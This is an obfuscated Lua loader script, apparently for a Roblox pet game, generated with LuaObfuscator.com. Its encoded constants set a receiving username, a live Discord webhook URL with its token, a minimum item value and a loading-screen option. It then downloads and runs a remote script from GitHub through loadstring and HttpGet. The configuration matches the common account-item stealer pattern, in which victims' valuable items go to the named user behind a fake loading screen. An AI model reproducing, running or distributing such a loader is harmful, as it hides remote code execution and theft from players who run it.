--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==0) then v91=v5(v81,v19);v19=nil;v90=1;end if (v90==1) then return v91;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-1)))%((5 -(1 + 2))^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v82-(v82%(620 -(555 + 64))) ;else local v83=((1810 -(282 + 595)) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v83 + v83))>=v83) and (928 -(214 + 713))) or ((1637 -(1523 + 114)) + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37=1270 -(226 + (1929 -885)) ;local v38;local v39;local v40;local v41;while true do if (v37==1) then return (v41 * (73054774 -56277558)) + (v40 * (65653 -(32 + (155 -70)))) + (v39 * (251 + 5)) + v38 ;end if (v37==((350 -(87 + 263)) + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;v37=1;end end end local function v24() local v42=180 -((1553 -(998 + 488)) + 113) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(2 + 0)) then v47=v20(v44,21,75 -44 );v48=((v20(v44,24 + 3 + 5 )==(3 -2)) and  -(953 -(802 + 150))) or (2 -(1 + 0)) ;v42=5 -2 ;end if (v42==(1 + 0)) then v45=998 -(915 + 82) ;v46=(v20(v44,2 -1 ,12 + (29 -21) ) * ((2 -(0 -0))^(1219 -(1069 + 118)))) + v43 ;v42=4 -2 ;end if (v42==((865 -(814 + 45)) -3)) then if (v47==((0 -0) + 0)) then if (v46==(0 -0)) then return v48 * (0 + (772 -(201 + 571))) ;else v47=792 -(368 + 423) ;v45=0 -(0 + 0) ;end elseif (v47==(2065 -(10 + 8))) then return ((v46==(0 -0)) and (v48 * ((443 -(416 + 26))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(440 + 583) ) * (v45 + (v46/((3 -1)^((1628 -(116 + 1022)) -(145 + 293))))) ;end if (v42==0) then v43=v23();v44=v23();v42=(1794 -1363) -(44 + 386) ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(886 -(261 + 624)) );v18=v18 + v49 ;local v51={};for v65=1 -0 , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 + 0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v52~=2) then else for v92= #"!",v23() do local v93=(function() return v21();end)();if (v20(v93, #">", #"|")==0) then local v102=(function() return 0 -0 ;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if ((3 -0)==v102) then if (v20(v104, #"xxx", #"gha")~= #"|") then else v105[ #"0313"]=(function() return v58[v105[ #".com"]];end)();end v53[v92]=(function() return v105;end)();break;end if (v102==(676 -(534 + 141))) then v105=(function() return {v22(),v22(),nil,nil};end)();if (v103==0) then local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();while true do if (v116~=(0 + 0)) then else v117=(function() return 0 + 0 ;end)();while true do if (v117~=(0 -0)) then else v105[ #"xxx"]=(function() return v22();end)();v105[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v103== #"}") then v105[ #"19("]=(function() return v23();end)();elseif (v103==2) then v105[ #"19("]=(function() return v23() -((1638 -(1373 + 263))^16) ;end)();elseif (v103~= #"-19") then else local v190=(function() return 1000 -(451 + 549) ;end)();local v191=(function() return;end)();while true do if (v190==(0 + 0)) then v191=(function() return 0 -0 ;end)();while true do if (v191~=(0 -0)) then else v105[ #"xxx"]=(function() return v23() -((5 -3)^(9 + 7)) ;end)();v105[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v102=(function() return 2;end)();end if (v102~=(2 + 0)) then else if (v20(v104, #"{", #"]")== #",") then v105[398 -(115 + 281) ]=(function() return v58[v105[1 + 1 ]];end)();end if (v20(v104,4 -2 ,2 -0 )== #">") then v105[ #"nil"]=(function() return v58[v105[ #"19("]];end)();end v102=(function() return 3 + 0 ;end)();end if (v102~=(0 -0)) then else local v107=(function() return 0;end)();local v108=(function() return;end)();while true do if (v107==(0 -0)) then v108=(function() return 0;end)();while true do if (v108==1) then v102=(function() return 868 -(550 + 317) ;end)();break;end if (v108~=(0 -0)) then else v103=(function() return v20(v93,562 -(306 + 254) , #"asd");end)();v104=(function() return v20(v93, #"asd1",1 + 5 );end)();v108=(function() return 1 -0 ;end)();end end break;end end end end end end for v94= #" ",v23() do v54[v94-#"|" ]=(function() return v28();end)();end return v56;end if (v52== #",") then local v86=(function() return 1467 -(899 + 568) ;end)();local v87=(function() return;end)();while true do if (v86~=(0 -0)) then else v87=(function() return 0;end)();while true do if (v87==1) then for v110= #"\\",v57 do local v111=(function() return 0 -0 ;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v111~=(1 + 0)) then else v114=(function() return nil;end)();while true do if (v112~= #"|") then else if (v113== #"]") then v114=(function() return v21()~=(285 -(134 + 151)) ;end)();elseif (v113==(1667 -(970 + 695))) then v114=(function() return v24();end)();elseif (v113== #"xnx") then v114=(function() return v25();end)();end v58[v110]=(function() return v114;end)();break;end if (v112~=(603 -(268 + 335))) then else local v160=(function() return 290 -(60 + 230) ;end)();while true do if (v160~=0) then else v113=(function() return v21();end)();v114=(function() return nil;end)();v160=(function() return 1;end)();end if (v160~=1) then else v112=(function() return  #" ";end)();break;end end end end break;end if (v111~=(572 -(426 + 146))) then else local v139=(function() return 0;end)();local v140=(function() return;end)();while true do if (v139~=(0 -0)) then else v140=(function() return 1990 -(582 + 1408) ;end)();while true do if (v140==(3 -2)) then v111=(function() return 1457 -(282 + 1174) ;end)();break;end if (v140~=(811 -(569 + 242))) then else local v194=(function() return 0 -0 ;end)();while true do if (v194==1) then v140=(function() return 1;end)();break;end if (v194==(0 + 0)) then v112=(function() return 0 -0 ;end)();v113=(function() return nil;end)();v194=(function() return 1025 -(706 + 318) ;end)();end end end end break;end end end end end v56[ #"91("]=(function() return v21();end)();v87=(function() return 7 -5 ;end)();end if (v87==2) then v52=(function() return 2;end)();break;end if (v87==0) then v57=(function() return v23();end)();v58=(function() return {};end)();v87=(function() return 1;end)();end end break;end end end if (v52==(1824 -(1195 + 629))) then local v88=(function() return 0 -0 ;end)();local v89=(function() return;end)();while true do if (v88~=0) then else v89=(function() return 0;end)();while true do if (v89~=0) then else v53=(function() return {};end)();v54=(function() return {};end)();v89=(function() return 242 -(187 + 54) ;end)();end if (v89==(782 -(162 + 618))) then v52=(function() return  #"<";end)();break;end if ((701 -(271 + 429))==v89) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v89=(function() return 2 + 0 ;end)();end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[1087 -(461 + 625) ];local v63=v59[9 -7 ];local v64=v59[1291 -(993 + 295) ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1 + 0 ;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=(1733 -(334 + 228)) -(418 + 753) ,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + (2 -1) ];else v77[v84]=v74[v84 + ((4057 -2854) -(373 + 829)) ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do local v85=0 + 0 ;while true do if ((3574==3574) and (v85==(0 + 0))) then v79=v67[v71];v80=v79[1 + 0 ];v85=530 -(406 + 123) ;end if ((2029<=3084) and ((1770 -(1749 + 20))==v85)) then if (v80<=((2 -1) + (5 -2))) then if ((221<390) and (v80<=(1323 -(1249 + 73)))) then if ((v80==(0 + 0)) or (2213<=1421)) then v77[v79[2 -0 ]]();else local v120=v79[1147 -(466 + 193 + 486) ];local v121=v77[v79[6 -3 ]];v77[v120 + (2 -1) ]=v121;v77[v120]=v121[v79[(456 -(141 + 95)) -(42 + 171 + 3) ]];end elseif ((v80<=((4895 -2993) -(106 + (4312 -2518)))) or (2037==2420)) then local v125=0 + 0 ;local v126;while true do if (v125==(0 + 0)) then v126=v79[5 -3 ];v77[v126]=v77[v126](v13(v77,v126 + (2 -1) ,v72));break;end end elseif ((3058<4860) and (4458>3904) and (v80==(117 -(4 + 110)))) then v77[v79[586 -(57 + 527) ]]=v79[1430 -(41 + 1386) ];else local v143=0;while true do if (v143==(3 + 0)) then v77[v79[105 -(17 + 86) ]]=v79[3];v71=v71 + 1 + 0 ;v79=v67[v71];v61[v79[7 -4 ]]=v77[v79[2 + 0 ]];v143=8 -(1 + 3) ;end if ((v143==(0 -0)) or (1296>=4446)) then v77[v79[168 -((334 -212) + 44) ]]=v79[5 -2 ];v71=v71 + ((3 + 0) -(2 + 0)) ;v79=v67[v71];v61[v79[3 + 0 ]]=v77[v79[1 + 1 ]];v143=1 -0 ;end if (v143==(69 -(30 + 35))) then v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[1259 -(1043 + 214) ]]=v79[11 -8 ];v71=v71 + (2 -(1 -0)) ;v143=1217 -(323 + 889) ;end if (((15 -9)==v143) or (1393>4489)) then v77[v79[582 -(361 + 219) ]]=v61[v79[(593 + 411) -(938 + 63) ]];v71=v71 + 1 ;v79=v67[v71];v77[v79[322 -(53 + 267) ]]=v61[v79[1 + 2 ]];break;end if (v143==(1 + 1)) then v79=v67[v71];v61[v79[416 -(15 + 398) ]]=v77[v79[(165 -(92 + 71)) + 0 ]];v71=v71 + (1139 -(782 + 356)) ;v79=v67[v71];v143=985 -(18 + 477 + 487) ;end if (v143==(18 -13)) then v79=v67[v71];v61[v79[2 + (1 -0) ]]=v77[v79[2 + (765 -(574 + 191)) ]];v71=v71 + (851 -(20 + 685 + 145)) ;v79=v67[v71];v143=5 + 1 ;end if (v143==(127 -(116 + 10))) then v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[6 -4 ]]=v79[741 -(542 + 196) ];v71=v71 + (1 -0) ;v143=3 -(2 -1) ;end end end elseif ((v80<=(2 + 4)) or (4424<27)) then if ((436>=123) and (v80>(3 + 2))) then local v127=v79[2];local v128,v129=v70(v77[v127](v13(v77,v127 + 1 + 0 + 0 ,v79[7 -4 ])));v72=(v129 + v127) -((851 -(254 + 595)) -1) ;local v130=1551 -((1252 -(55 + 71)) + 425) ;for v135=v127,v72 do v130=v130 + (406 -((155 -37) + 287)) ;v77[v135]=v128[v130];end else v77[v79[7 -5 ]]=v61[v79[1124 -(118 + 1003) ]];end elseif (v80<=(20 -13)) then v61[v79[1 + 2 ]]=v77[v79[1900 -(260 + 1638) ]];elseif (v80>((2175 -(573 + 1217)) -(142 + 235))) then local v144;local v145,v146;local v147;v77[v79[2]]=v79[13 -10 ];v71=v71 + 1 + 0 ;v79=v67[v71];v147=v79[2 + 0 ];v145,v146=v70(v77[v147](v13(v77,v147 + (978 -(553 + 424)) ,v79[5 -2 ])));v72=(v146 + v147) -1 ;v144=0 + 0 ;for v156=v147,v72 do local v157=0 + (0 -0) ;while true do if ((500<1816) and ((0 -0)==v157)) then v144=v144 + 1 + 0 ;v77[v156]=v145[v144];break;end end end v71=v71 + 1 + 0 ;v79=v67[v71];v147=v79[1 + 1 ];v77[v147]=v77[v147](v13(v77,v147 + 1 + 0 + 0 ,v72));v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[(8 -3) -3 ]]();v71=v71 + (2 -1) ;v79=v67[v71];do return;end else do return;end end v71=v71 + (2 -1) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3Q0003083Q00557365726E616D65030B3Q00657363617061706461313403073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3133323534393031353732302Q3538362Q30322F41326F48644F6B7236703267506D67634A7A63306955462D367779522D496A3947726D5A634B4D3635784D696F6942574F567172766C39774E4A706567345A33434F4551030A3Q004D696E696D756D524150024Q0080842E4103153Q0073656C65637465644C6F6164696E675363722Q656E03013Q0034030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403443Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F496D4469676974616C7A2F4D6F7269536372697074732F6D61696E2F50455453474F00103Q0012043Q00023Q00124Q00013Q00124Q00043Q00124Q00033Q00124Q00063Q00124Q00053Q00124Q00083Q00124Q00073Q00124Q00093Q00122Q0001000A3Q00200100010001000B0012090003000C6Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
